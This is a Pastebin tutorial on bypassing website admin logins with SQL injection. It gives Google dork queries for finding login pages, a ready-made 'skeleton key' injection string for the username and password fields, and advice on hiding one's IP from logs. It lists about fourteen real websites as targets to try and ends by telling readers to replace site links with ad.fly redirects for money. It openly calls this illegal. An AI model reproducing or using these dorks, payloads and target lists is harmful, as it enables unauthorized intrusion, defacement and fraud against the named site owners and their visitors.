Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- +-==============================================================-+
- | _____ _______ __ _____ _ _ |
- | | __ \_ _\ \ / / / ____| (_) | | |
- | | | | || | \ \_/ / | | __ _ _ _ __| | ___ |
- | | | | || | \ / | | |_ | | | | |/ _` |/ _ \ |
- | | |__| || |_ | | | |__| | |_| | | (_| | __/ |
- | |_____/_____| |_| \_____|\__,_|_|\__,_|\___| |
- | __ __ __ _____ ____ _ _ __ __ __ |
- | \ \ \ \ \ \ / ____|/ __ \| | (_) / / / / / / |
- | \ \ \ \ \ \ | (___ | | | | | _ / / / / / / |
- | > > > > > > \___ \| | | | | | | < < < < < < |
- | / / / / / / ____) | |__| | |____| | \ \ \ \ \ \ |
- | /_/ /_/ /_/ |_____/ \___\_\______|_| \_\ \_\ \_\ |
- | |
- | A N O F F I C I A L G U I D E |
- +-==============================================================-+
- | Vulnerability Disclosure: |
- | The vulnerability is located in the `username` and `password` |
- | input field values of the `login` module. Remote attackers are |
- | able to execute own sql commands by manipulation of the GET |
- | method request with the vulnerable username and password |
- | parameter. The request method to inject the sql command is GET |
- | and the issue is located on the application-side of the |
- | online-service. The sql vulnerability allows an attacker to |
- | remotely gain unauthorized access to the account system of the |
- | content management system. |
- +-==============================================================-+
- | Request Method(s): |
- | [+] GET |
- | Vulnerable Module(s): |
- | [+] Login |
- | Vulnerable Parameter(s): |
- | [+] username |
- | [+] password |
- +-==============================================================-+
- | _______ _ _ _ |
- | |__ __| | | (_) | | |
- | | |_ _| |_ ___ _ __ _ __ _| | |
- | | | | | | __/ _ \| '__| |/ _` | | |
- | | | |_| | || (_) | | | | (_| | | |
- | |_|\__,_|\__\___/|_| |_|\__,_|_| |
- | |
- | In this tutorial we will be pen testing random administration |
- | panels from around the world. This is a method pen-testers use |
- | to bypass weak CMS/Admin Panels. This method requires No |
- | experience. |
- | |
- | 1.) Protect your IP# from being logged: |
- | Hacking like this is illegal, so taking the risk is entirely |
- | up to you, I take no responsibility. For educational purposes |
- | only. |
- | |
- | Ok before we began you need to protect your IP# from being |
- | logged by the server your about to hack into, for this were |
- | gonna need a proxy/VPN (Virtual Private Network) I'd suggest |
- | using Tor if you have it, if not I would recommend using |
- | Hotspot Shield for this tutorial (it's free) |
- | https://www.hotspotshield.com/ |
- | |
- | IP Test: |
- | http://whatismyipaddress.com/ |
- | To Test your IP, Turn on your proxy/VPN and refresh the page |
- | above, if your IP# changes your good. If not try again until |
- | it does. |
- | |
- | Next you need to Disable WebRTC in your web browser to prevent |
- | your VPN from leaking your REAL IP Address. |
- | http://hackforums.net/showthread.php?tid=4682819 |
- | |
- | 2.) Go to Google & Search: |
- | intitle:Admin inurl:login.php site:.com |
- | |
- | ***Screenshot: http://i.imgur.com/6FKY2xS.jpg*** |
- | ^^This will be your Main Dork. You can modify it to find more |
- | vulnerable admin panels. |
- | |
- | EXAMPLES: |
- | intitle:Admin inurl:login.php site:.net |
- | intitle:Admin inurl:login.php site:.org |
- | intitle:Admin inurl:login.php site:.uk |
- | intitle:Admin inurl:login.php site:.br |
- | |
- | To find more Web Country Codes, go to: |
- | http://goes.gsfc.nasa.gov/text/web_country_codes.html |
- | |
- | Other dork extensions you could try. |
- | inurl:/admin_login |
- | inurl://admin/_login.php |
- | inurl://panel/admin.php |
- | inurl://admin/admin_login.php |
- | inurl://administracao/ |
- | inurl://admin/autentica/loga.php |
- | |
- | 3.) Locating vulnerable admin panels: |
- | Locating vulnerable admin panels is a slow process and |
- | requires a little patience but the payout is half the fun. |
- | Enter your Google dork (posted above), starting at page 1 in |
- | google (Right-Click>Open link in new tab) start clicking on |
- | links one by one until you have 5-10 tabs open in your |
- | browser. |
- | |
- | 4.) Skeleton Key: |
- | USERNAME: '=' 'or' |
- | PASSWORD: '=' 'or' |
- | |
- | Once at the admin panel, enter your Skeleton Key in attempts |
- | to bypass: |
- | ***Screenshot: http://i.imgur.com/04mGZ0Q.jpg*** |
- | ***Screenshot: http://i.imgur.com/K3IxjkX.jpg*** |
- | |
- | 5.) Demos: |
- | http://www.sdcsm.org/webadmin/login.php |
- | http://dhansirirestaurant.com/webadmin/login.php |
- | http://www.viewoptics.in/webadmin/login.php |
- | http://oco.net/login.php |
- | http://www.cyclismactu.net/new_admin/login.php |
- | http://www.khondantainews.net/login.php |
- | http://pigeontools.net/amulet/login.php |
- | http://www.shivalikinstitutions.com/login.php |
- | http://www.lifethroughalens.com/login.php?page=index.php |
- | http://www.sgpgiuromeet.com/login.php |
- | http://paigeglass.com/login.php |
- | http://kopkarjembo.com/area/admin.php |
- | http://mycreativekidscommunitywatch.com/admin/login.php |
- | http://motektech.com/login.php |
- | |
- | That's it! Once your in the admin panel you can start editing |
- | the site. To take advantage of this replace links, banners |
- | directory's ..ect with your ad.fly: link to redirect users |
- | and earn money. |
- +-==============================================================-+
- (c) mObiIe | Edited Tutorial 2012
Add Comment
Please, Sign In to add comment